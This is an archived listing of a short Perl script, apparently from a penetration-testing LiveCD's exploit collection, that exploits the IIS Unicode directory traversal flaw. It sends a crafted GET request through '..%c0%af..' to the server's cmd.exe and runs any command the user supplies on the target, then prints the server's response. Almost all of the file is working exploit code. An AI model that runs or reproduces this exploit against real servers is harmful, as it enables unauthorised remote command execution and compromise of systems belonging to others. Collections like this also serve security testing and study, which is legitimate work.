home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / unicodexecute.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  1KB  |  37 lines

---

1. #!/usr/bin/perl
2. # Very simple PERL script to execute LIMITED commands on IIS Unicode vulnerable servers
3. # Use port number with SSLproxy for testing SSL sites
4. # Usage: unicodexecute IP:port command
5. # Only makes use of "Socket" library
6. # Roelof Temmingh 2000/10/21
7. # roelof@sensepost.com http://www.sensepost.com
8.  
9. use Socket;
10. # --------------init
11. if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
12. ($host,$port)=split(/:/,@ARGV[0]);
13. $command=@ARGV[1];
14. print "Executing $command on $host:$port\n";
15. # WE NEED MORE TRANSLATION TABLES BELOW..ANYONE?
16. $command=~s/ /+/g;
17.  
18. $target = inet_aton($host);
19. # ---------------send the command
20. my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
21. print @results;
22. # ------------- Sendraw - thanx RFP rfp@wiretrip.net
23. sub sendraw {   # this saves the whole transaction anyway
24.         my ($pstr)=@_;
25.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
26.                 die("Socket problems\n");
27.         if(connect(S,pack "SnA4x8",2,$port,$target)){
28.                 my @in;
29.                 select(S);      $|=1;   print $pstr;
30.                 while(<S>){ push @in, $_;}
31.                 select(STDOUT); close(S); return @in;
32.         } else { die("Can't connect...\n"); }
33. }
34. # Spidermark: sensepostdata
35.  
36.  
37.